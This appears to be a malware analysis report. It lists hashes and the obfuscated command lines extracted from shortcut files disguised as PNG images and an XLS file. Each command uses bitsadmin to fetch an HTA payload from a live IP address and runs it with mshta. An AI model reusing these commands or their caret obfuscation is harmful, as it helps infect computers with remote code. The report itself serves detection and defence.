|
Hash | Hash Value |
|---|---|
| MD5 | 93e7573b1e084c582da26c50723d2a0a
|
| Sha1 | 1061685716467917d2a74e70bd344026e7a08908
|
| Sha256 | e516a52f9e1f70f23ab7fd6687e0c4e80a8802d547224e852b3a20864f04204d
|
| Sha384 | 3c800823196bed90e892aeaf8e55023951e5a40539fbe610c417a689d159759259549ef79560c1eada4c4e45ee8ee200
|
| Sha512 | ca84623b8d71f55ac5bca84b466fc862a99e28aab03d89831e36cb2dc2e8ce8bb227e8d4c0a5da37a2c83602641d3bbdc2ccb06c00c6b4125f6372ef2b6ed890
|
| SSDeep | 96:Zjiwm1SKr1yNJ212V2pAtWwRCG/1s7CEw4n:Zjd7JHqCEw4n
|
| TLSH | 0BD5126063FC5210E072CFB689215B45DBFBB4927BB2D3CA0761326C6E6172CDE12B25
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^h^x^y^6^W^g^q^D^S^6^r^u^V^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/operatingdescribe.hta ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Q^r^H^f^v^B^t^3^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/devilishsalty.hta ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^H^D^E^Y^p^u^T^0^F^3^W^h^1^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/roosterscare.hta ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Z^t^b^R^X^r^4^v^g^s^G^V^L^B^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/mineralgoddess.hta ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a && cmd /c !mycmd! |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^h^x^y^6^W^g^q^D^S^6^r^u^V^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/operatingdescribe.hta ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a && cmd /c !mycmd! Malicious |
93e7573b1e084c582da26c50723d2a0a > PNG_0012.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Q^r^H^f^v^B^t^3^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/devilishsalty.hta ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a && cmd /c !mycmd! Malicious |
93e7573b1e084c582da26c50723d2a0a > PNG_0013.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^H^D^E^Y^p^u^T^0^F^3^W^h^1^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/roosterscare.hta ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a && cmd /c !mycmd! Malicious |
93e7573b1e084c582da26c50723d2a0a > PNG_0014.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Z^t^b^R^X^r^4^v^g^s^G^V^L^B^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/mineralgoddess.hta ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a && cmd /c !mycmd! Malicious |
93e7573b1e084c582da26c50723d2a0a > SpisokSZCH.xls.lnk |